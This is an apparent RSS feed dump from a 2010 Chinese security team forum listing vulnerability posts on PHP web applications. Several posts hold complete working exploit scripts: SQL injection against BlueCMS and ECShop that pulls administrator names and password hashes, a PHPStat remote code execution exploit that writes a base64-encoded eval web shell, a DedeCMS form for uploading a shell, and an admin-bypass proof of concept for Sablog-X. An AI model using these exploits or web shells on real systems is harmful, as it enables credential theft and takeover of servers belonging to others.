<![CDATA[Wolves Security Team]]> http://bbs.wolvez.org/index.php Thu, 02 Sep 2010 11:59:25 +0000 FluxBB <![CDATA[BlueCMS getip()注射漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=148&action=new by cnryan
Team: bbs.wolvez.org


一、描述
BlueCMS是一个地方分类信息门户专用CMS系统。
程序在使用getip()函数获取客户端ip时没有严格过滤数据,导致sql注射漏洞。


二、分析
      //comment.php

$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";       // 注意getip()
$db->query($sql);

接下来看看这个函数
    //include/common.fun.php

function getip()
{
if (getenv('HTTP_CLIENT_IP'))
{
   $ip = getenv('HTTP_CLIENT_IP');        //可伪造
}
elseif (getenv('HTTP_X_FORWARDED_FOR'))
{
   $ip = getenv('HTTP_X_FORWARDED_FOR'); //可伪造
}
elseif (getenv('HTTP_X_FORWARDED'))
{
   $ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR'))
{
   $ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED'))
{
   $ip = getenv('HTTP_FORWARDED');
}
else
{
   $ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}

漏洞比较简单,$_SERVER老掉牙的问题。


三、利用

最后附上一个exp

<?php
print_r('
+---------------------------------------------------------------------------+
BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan     

            W . S . T                        
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Example:
php '.$argv[0].' localhost /bluecms/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
send();
send2();
function send()
{
    global $host, $path;
    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";
    $getinj=" 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";
    $data = "POST ".$path."comment.php?act=send HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

function send2()
{
global $host, $path;
$message="GET ".$path."news.php?id=1 HTTP/1.1\r\n";
$message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n";
$message.="Host: $host\r\n";
$message.="Connection: Keep-Alive\r\n\r\n";
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[-]No response from'.$host;
    die;
}
fputs($fd,$message);
$resp = '';
while (!feof($fd)) {
    $resp.=fgets($fd);
}
fclose($fd);
preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/",$resp,$db);
if($db[1][0]&$db[2][0])
{
echo "username->".$db[1][0]."\r\n";
echo "password->".$db[2][0]."\r\n";
echo "[+]congratulation ^ ^";
}else die('[-]exploited fail >"<');
}
?>
]]> Thu, 02 Sep 2010 11:59:25 +0000 http://bbs.wolvez.org/viewtopic.php?id=148&action=new <![CDATA[dvbbs php2.0漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=147&action=new puret_t wrote:

顶楼主
两年前的漏洞报告估计官方理都没理...

:)好久不见大牛现身了

]]> Mon, 23 Aug 2010 15:52:13 +0000 http://bbs.wolvez.org/viewtopic.php?id=147&action=new <![CDATA[想加入狼族或论坛的同学请进]]> http://bbs.wolvez.org/viewtopic.php?id=145&action=new 请有兴趣的朋友将个人原创作品、个人简介、联系方式等信息发mail到wolvezbuzz@gmail.com
也可直接在团队Google Buzz中留言

欢迎广大安全爱好者的加入:-)

]]> Sat, 17 Jul 2010 02:30:35 +0000 http://bbs.wolvez.org/viewtopic.php?id=145&action=new <![CDATA[分析了下某牛的dedecms5.6注入漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=144&action=new by:xhm1n9

      1. 此漏洞最先由toby57牛在http://hi.baidu.com/toby57/blog/item/074f6b592d1dac272834f0c7.html公布出来,本人只是将漏洞跟了下,希望toby57别见怪啊!利用地方不一样,但问题出在同一地方!

caicai.php
...............................................................................
if($tid!=0)
{
$arr = $dsql->GetOne("Select * From `#@__arctype` where id='$tid' And corank=0 ");
if($cfg_list_son=='Y')
{
   $CrossID = GetSonIds($tid,$arr['channeltype']);      //注意
}
else
{
   $CrossID = $tid;
}
        .........................
         $typequery = " arc.typeid in($CrossID) And ";
}

$query = "Select arc.*,m.userid,m.face,
          tp.typedir,tp.typename,tp.isdefault,tp.defaultname,tp.namerule,tp.namerule2,tp.ispart,tp.moresite,tp.siteurl,tp.sitepath
          From `#@__archives` arc left join `#@__arctype` tp on tp.id=arc.typeid left join `#@__member` m on m.mid=arc.mid
          where $typequery arc.arcrank>-1
          order by arc.`{$sort}` desc limit $maxrc ";
$dlist->SetParameter('tid',$tid);
$dlist->SetParameter('sort',$sort);
$dlist->SetTemplate(DEDEMEMBER.'/templets/caicai.htm');
$dlist->SetSource($query);

.............................................................................................

GetSonIds()函数在channelunit.func.php中有定义

function GetSonIds($id,$channel=0,$addthis=true)
{
global $_Cs;                                                 //注意
$GLOBALS['idArray'] = array();
if( !is_array($_Cs) )
{
   require_once(DEDEROOT."/data/cache/inc_catalog_base.inc");
}
GetSonIdsLogic($id,$_Cs,$channel,$addthis);
$rquery = join(',',$GLOBALS['idArray']);
$rquery = preg_replace("/,$/", '', $rquery);

return $rquery;
}

//递归逻辑
function GetSonIdsLogic($id,$sArr,$channel=0,$addthis=false)
{   echo $id;
if($id!=0 && $addthis)
{
   $GLOBALS['idArray'][$id] = $id;
}
foreach($sArr as $k=>$v)
{
   if( $v[0]==$id && ($channel==0 || $v[1]==$channel ))
   {
    GetSonIdsLogic($k,$sArr,$channel,true);var_dump($GLOBALS['idArray']);   //第一个参数为$_Cs下标
   }
}
}
   漏洞在于引进函数中的$_Cs没有初始化,我们可以利用它的下标注入
例:caicai.php?tid=1&_Cs[8)'][0]=1&_Cs[8)'][1]=1就会看到报错信息.

2,mtypes.php 注入

elseif ($dopost == 'save')
{
if(isset($mtypeidarr) && is_array($mtypeidarr))
{
   $delids = '0';
   $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
   foreach($mtypeidarr as $delid)
   {
    $delids .= ','.$delid;
    unset($mtypename[$delid]);
   }
   $query = "delete from `#@__mtypes` where mtypeid in ($delids) and mid='$cfg_ml->M_ID';";
   $dsql->ExecNoneQuery($query);
}
foreach ($mtypename as $id => $name)               //注意
{
   echo $name = HtmlReplace($name);
                     echo $id;
   $query = "update `#@__mtypes` set mtypename='$name' where mtypeid='$id' and mid='$cfg_ml->M_ID'";
   $dsql->ExecuteNoneQuery($query);
}
//ShowMsg('分类修改完成','mtypes.php');
}
magic_quotes_gpc=off时,程序没处理$mtypename数组下标的值,可造成注入

现在的dedecms默认开启了内置80sec写的过滤函数,注入语句要特殊构造,上面给的链接里其实牛人己忽破了,感兴趣的同鞋们可以自己看图本地测试:)

]]> Fri, 16 Jul 2010 05:09:02 +0000 http://bbs.wolvez.org/viewtopic.php?id=144&action=new <![CDATA[Molyx 2.81多个bug]]> http://bbs.wolvez.org/viewtopic.php?id=136&action=new 不错,顶一下。

]]> Sun, 06 Jun 2010 09:55:52 +0000 http://bbs.wolvez.org/viewtopic.php?id=136&action=new <![CDATA[ECShop注射漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=133&action=new by Ryat
http://www.wolvez.org
2010-05-15

最近好像出了几个ECShop的漏洞,我也来凑下热闹;p

因为漏洞时间比较长了,代码细节记不清了,所以就不写分析了,原理上和[PCH-005]一样的,有兴趣的tx可以自己分析下:)

EXP

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.7.2 SQL injection / admin credentials disclosure exploit
by puret_t
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#\':([\S]+):([a-z0-9]{32})\'#', $resp, $hash);

if ($hash)
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path;
    
    $arr = array('attr' => array('\') AND 0 UNION SELECT (SELECT CONCAT(0x27,0x3a,user_name,0x3a,password) FROM ecs_admin_user WHERE action_list=\'all\' LIMIT 1), 1#' => 1));
    $cmd = base64_encode(serialize($arr));

    $data = "GET ".$path."search.php?encode=".$cmd."  HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
]]> Sat, 15 May 2010 02:18:57 +0000 http://bbs.wolvez.org/viewtopic.php?id=133&action=new <![CDATA[dedecms5.1注入]]> http://bbs.wolvez.org/viewtopic.php?id=128&action=new 5.1测试的没有.

]]> Sat, 06 Mar 2010 06:10:18 +0000 http://bbs.wolvez.org/viewtopic.php?id=128&action=new <![CDATA[DEDECMS v5.5 GBK Final 的一个鸡肋漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=125&action=new 在session.auto_start开启的情况下可以任意覆盖$_SESSION变量,我们可以伪造管理员登录并上传文件

/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php

上传时重命名为    *.php.
即可绕过检查上传shell

exp:
  <form action="" method='POST' enctype="multipart/form-data">
  U&nbsp;R&nbsp;L:<input type="text" name="target" size="50" value="http://192.168.1.110">&nbsp;&nbsp;
  Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
File:&nbsp;<input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      RenameTo:<input type='test' name='newname' value="shell.asp."/><br>
      &nbsp;
    <input type=hidden name="_SESSION[dede_admin_id]" value=1>
        <input type=hidden name="bkurl" value=1>
      <input type='button' value='submit' onclick="fsubmit()"/><br><br><br><br><br><br>
    dedecms 0day exp..<br>
    need: session.auto_start = 1<br>
    By toby57    2010/2/22
  </form>
<script>
function fsubmit(){
    var form = document.forms[0];
    form.action = form.target.value + form.path.value;
    tmpstr = form.target.value +'/'+ form.newname.value;
    form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
    form.submit();
    }
</script>

]]> Sat, 27 Feb 2010 09:55:07 +0000 http://bbs.wolvez.org/viewtopic.php?id=125&action=new <![CDATA[Sablog-X 2.0 后台管理权限欺骗漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=124&action=new by Ryat
http://www.wolvez.org
2010-02-24

好久没更新了;p
前不久80vul.com公布了sax2.0的一个漏洞,随后4ngel发布了补丁,不过权限验证部分的代码还是存在问题,下面就来简单说说这个漏洞:D

// cp.php

if (!$sax_uid || !$sax_pw || !$sax_logincount || !$sax_hash) {
// 只要这个条件不满足,就可以通过后台的权限验证了
    loginpage();
}
...
if ($sax_group == 1) {
// 如果要获得管理员权限,还必须保证$sax_group的值为1
...

下面来看下这几个变量是怎么来的

// common.inc.php

list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
// authcode()就是简单的调用base64_decode
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
// 这些变量来自$_COOKIE,是可以控制的:)
// 不过后面的代码在一定条件下会通过extract($_EVO)来重新注册这些变量

$sax_uid = intval($sax_uid);
$sax_pw = sax_addslashes($sax_pw);
$sax_logincount = intval($sax_logincount);
$sax_group = 4;
// 默认的值为4,而我们需要的值是1
$_EVO = array();
// 这里是fix那个变量覆盖的漏洞:)

$seccode = $sessionexists = 0;
$userfields = 'u.userid AS sax_uid, u.username AS sax_user, u.password AS sax_pw, u.groupid AS sax_group, u.logincount AS sax_logincount, u.email as sax_email, u.url as sax_url, u.lastpost, u.lastip, u.lastvisit, u.lastactivity';
// 这里定义的字段包括sax_user、sax_pw、sax_group、sax_logincount,这些都是后台权限验证时要用到的
if ($sax_hash) {
    if ($sax_uid && $sax_pw) {
// 流程[1]
// 这里会查询sax_group,但如果我们想让查询出的值为1[也就是说查询出管理员的信息],就必须知道管理员的sax_hash、sax_pw、sax_logincount等多个值
        $query = $DB->query("SELECT s.hash, s.seccode, $userfields
            FROM {$db_prefix}users u
            LEFT JOIN {$db_prefix}sessions s ON (s.uid = u.userid)
            WHERE s.hash='$sax_hash' AND u.userid='$sax_uid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip'
            AND u.password='$sax_pw' AND u.logincount='$sax_logincount' AND s.auth_key='$sax_auth_key'");
    } else {
        $query = $DB->query("SELECT hash,uid as sessionuid,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip' LIMIT 1");
// 流程[2]
// 如果我们知道管理员的sax_hash和onlineip,就可以使下面的$_EVO['sessionuid']的值为管理员的id
    }
    if ($_EVO = $DB->fetch_array($query)){
        $sessionexists = 1;
        if($_EVO['sessionuid']) {
// 流程[3]
            $query = $DB->query("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='".intval($_EVO['sessionuid'])."'");
            $_EVO = array_merge($_EVO, $DB->fetch_array($query));
// 这里查询的数据会合并到$_EVO,而我们只要能控制$_EVO['sessionuid']的值为1[假设我们要查询的管理员id为1],就可以查询出正确的管理员信息,这样就可以保证sax_group的值为1了
            $sax_uid = $_EVO['userid'];
        }
    } else {
        if($_EVO = $DB->fetch_one_array("SELECT hash,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'")) {
            dcookies();
            $sessionexists = 1;
        }
    }
}
......
@extract($_EVO);

由上面的代码可以看到,如果我们知道session表中uid为1的数据的sax_hash和onlineip,通过流程[2][3]就可以查询出正确的管理员信息,再通过extract($_EVO)注册变量,就可以通过后台的验证,获得管理员权限了:)
那么我们如何知道正确的sax_hash和onlineip呢?

// global.func.php

function updatesession() {
...
        replacesession(1);
...
}
...
function replacesession($insert = 0) {
...
$ips = explode('.', $onlineip);
...
        $DB->query("INSERT INTO {$db_prefix}sessions (hash, auth_key, ip1, ip2, ip3, ip4, uid, groupid, lastactivity, seccode, is_robot) VALUES ('$sax_hash', '$sax_auth_key', '$ips[0]', '$ips[1]', '$ips[2]', '$ips[3]', '$sax_uid', '$sax_group', '$timestamp', '$seccode', '".IS_ROBOT."')");
...

replacesession()函数为我们提供帮助,因为$sax_hash、$sax_uid、$onlineip这些变量是可以控制的,所以我们可以向session表中出入一条uid为1的数据:)

首先我们使$sax_uid为1,$sax_pw为空,这样就会跳过流程[1]执行流程[2],这时我们的sax_hash和onlineip在session表中并不存在,所以流程[3]不会执行,通过extract($_EVO)注册变量时也不会重新注册$sax_uid、$sax_hash和$onlineip,这样我们就可以通过updatesession()函数向session表中插入一条uid为1同时sax_hash和onlineip也是我们知道的数据了
然后我们重新执行上面的过程,因为这时session表里已经有了我们需要的数据了,流程[3]将被执行,user表中uid为1的管理员数据将被查询出并合并到$_EVO,并通过extract()重新注册变量[$sax_group的值将被重新注册为1],这样我们就可以通过后台权限验证,并获得管理员权限了:)

PoC:

GET /cp.php  HTTP/1.1;
Host: 127.0.0.1
Connection: Close
Cookie: sax_auth=MQkJ;sax_hash=abcdef;
]]> Wed, 24 Feb 2010 11:05:19 +0000 http://bbs.wolvez.org/viewtopic.php?id=124&action=new <![CDATA[Php168一个即将被补的代码执行?]]> http://bbs.wolvez.org/viewtopic.php?id=31&action=new 08年的老东西了,不过今天在某地方看到了这个exp,很诧异这个怎么泄露出去的...
所以还是从内部转出来吧...

]]> Fri, 01 Jan 2010 15:17:52 +0000 http://bbs.wolvez.org/viewtopic.php?id=31&action=new <![CDATA[今年写的几篇老文]]> http://bbs.wolvez.org/viewtopic.php?id=113&action=new PHPStat 2.0 远程代码执行漏洞

Flyh4t [Wolvez.org]

PHPStat是一款专业的网站流量统计软件系统,提供网站日志分析、网站数据分析、用户行为分析系统,为客户提供深入挖掘的网站流量交叉数据报告.在访客行为分析,网络营销分析和网站决策支持方面有独特的分析体系,为客户找到数据背后的真实有价值的东西,拿出可执行性建议。该系统开发商普艾斯将自己定位为中国最专业的网站数据分析技术提供商,写出来的代码功能确实不错,但是安全性却非常差,漏洞处处可见。使用PHPStat统计的网站基本上可以被黑客秒杀。
   该系统绝大部分代码是zend加密的,解密后我们来看user_info.php 中普通用户修改统计网站的代码(新建的时候基本相似)

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
……
$fileStr .= "<?\nif( !defined('WEB_HOME') ) exit('Access Denied');\n";
                $fileStr .= "if( file_exists( \"../count/exclusion/website_\".\$websiteid.\"_regexp.php\")  )\n";
                $fileStr .= "include_once \"../count/exclusion/website_\".\$websiteid.\"_regexp.php\";\n";
                $fileStr .= "\n//统计网站地址\n";
                $fileStr .= "\$siteurl = \"".$_POST['site']."\";\n";
                $fileStr .= "\n//程序排除IP地址列表\n";
……
$fileStr .= "\$mainsitecode = \"".$Tmp[sitegroup]."\";\n";
                $fileStr .= "?>";
                if ( !file_exists( COUNT_DIRNAME."/exclusion/website_".$Tmp[website].".php" ) )
                {
                        write_to_file( COUNT_DIRNAME."/exclusion/website_".$Tmp[website].".php", "", "w+" );
                }
……
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

从以上代码可以看出,假设普通用户添加的网站编号为100003,则配置文件为
\count\exclusion\website_100003.php,内容格式如下所示:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?
if( !defined('WEB_HOME') ) exit('Access Denied');
if( file_exists( "../count/exclusion/website_".$websiteid."_regexp.php")  )
include_once "../count/exclusion/website_".$websiteid."_regexp.php";

//统计网站地址
$siteurl = "http://127.0.0.1 ";

//程序排除IP地址列表

//程序包含目录地址列表

//程序所属主站点代码
$mainsitecode = "50";
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

从上面的代码可以看出,我们提交的siteurl会被写入php文件中并被双引号括起来。熟悉php的朋友应该明白了吧?利用双引号的特性,我们可以构造一个特殊的siteurl来写入文件并成功执行,我构造的siteurl如下:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x))}}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

上面这段代码是将 <?php @eval($_POST[a]); ?>1 到fl.php文件。利用base64_encode编码避免了使用单引号,所以无须考虑gpc的影响。注意,在字符串不包括 + \ =等特殊符号的情况下,base64_decode的参数是无须使用单引号或者双银引号的。
现在还剩下一个问题,文件开始的代码 if( !defined('WEB_HOME') ) exit('Access Denied'); 限制了我们直接触发这段小的shellcode,我们必须找到一个define了WEB_HOME的文件来包含之。PHPStat为我们提供了多个这样的文件我们继续看\templates\ms\common\top.php文件的部分代码,该文件是可以直接访问的。

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?
    session_start();
    include_once '../../../include.inc/config.inc.php';
    include_once '../../../include.inc/function.php';
    include_once '../../../include.inc/function_pagerank.php';
    include_once '../../../include.inc/global.inc.php';
    include_once '../../../include.inc/conn.db.inc.php';
    include_once '../../../include.inc/pdo_page.inc.php';
    include_once '../../../parse_site.php';
    

    $website   = strtolower(strval($_GET[website]));
    $action    = strtolower(strval($_GET[action]));
    $websiteid = $website;
    $queryLimit = new queryLimit();
    if( strval($_GET[showtype] ) == 'all' ) $website = $website."&showtype=all";

    include_once "../../../".COUNT_DIRNAME."/exclusion/website_".$websiteid.".php";
//此处可以触发我们的代码
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

分析就到这里,下面给出exploit,做学习之用

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<?php
print_r('
+---------------------------------------------------------------------------+
PHPStat 2.0 remote code execution exploit
by Flyh4t
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path website
Example: php '.$argv[0].' localhost /PHPStat2/ 100001
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$website = $argv[3];
$websiteid = $website - 100000;
$cookie = 'PHPStatCookie=PHPStat; PHPStatUser=flyh4t; PHPSESSID=16973668032f872c76a4bfe99bc9ee7a';
$cmd = 'sitename=flyh4t&website='.$website.'&sitedes=flyh4t&site=http%3A%2F%2F${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x))}}&websitetype=%D7%DB%BA%CF%C3%C5%BB%A7&siteshow=0&siterank=0&sitetype=0&exclusionip=&exclusioninter=&action=updatesite&websiteid='.$websiteid;
$shell = 'http://'.$host.$path.'templates/ms/common/fl.php';
send1($cmd);
send2();
if (!file_get_contents($url) && file_get_contents($shell) == '1')
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else 
    exit("Exploit Failed!\n");
    
function send1($cmd)
{
    global $host, $path, $website, $cookie;    
    $message = "POST ".$path."user_info.php?action=editsite&website=$website HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: $cookie \r\n\r\n";  
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
}

function send2()
{
    global $host, $path, $website, $cookie;  
    $message = "GET ".$path."templates/ms/common/top.php?website=$website HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: $cookie \r\n\r\n";  
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    }
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
]]> Wed, 23 Dec 2009 01:38:09 +0000 http://bbs.wolvez.org/viewtopic.php?id=113&action=new <![CDATA[绕过'Access Denied']]> http://bbs.wolvez.org/viewtopic.php?id=112&action=new heige的百度空间老是掉留言,看着玩插一脚. :)

register_globals = On

<?php
$sqlcontent = "<?PHP exit('Access Denied'); ?>".$p."\n";
file_put_contents($logfile, $sqlcontent);
?>

exp-demo.php?logfile=php://filter/write=convert.base64-decode/resource=abc.php&p=aPD9waHAgcGhwaW5mbygpOy8vPz4=

http://marc.info/?l=full-disclosure&m=1 … 521671&w=2
base64-decode会掉过不能解码的特殊字符,变成PHPexitAccessDenied,Base64编码要求把3个8位字节(3*8=24)转化为4个6位的字节(4*6=24),保证能顺利解码补齐字符随便加个a补齐20位.

http://docs.php.net/manual/zh/filters.convert.php

]]> Mon, 14 Dec 2009 10:09:40 +0000 http://bbs.wolvez.org/viewtopic.php?id=112&action=new <![CDATA[PunBB官方上传附件扩展注射漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=98&action=new :)

]]> Mon, 26 Oct 2009 16:31:45 +0000 http://bbs.wolvez.org/viewtopic.php?id=98&action=new <![CDATA[中易广告联盟系统(ZYADS) sql注入和本地包含漏洞]]> http://bbs.wolvez.org/viewtopic.php?id=49&action=new 呵呵,外面到处都是了,就转出来吧。

]]> Wed, 21 Oct 2009 04:55:35 +0000 http://bbs.wolvez.org/viewtopic.php?id=49&action=new <![CDATA[Bypass Magic Quote&Xss?]]> http://bbs.wolvez.org/viewtopic.php?id=92&action=new http://www.80vul.com/pch/pch-003.txt

可以看下里面关于preg_replace()的部分,就可以清楚产生这个问题的原因了

]]> Sat, 25 Jul 2009 13:36:37 +0000 http://bbs.wolvez.org/viewtopic.php?id=92&action=new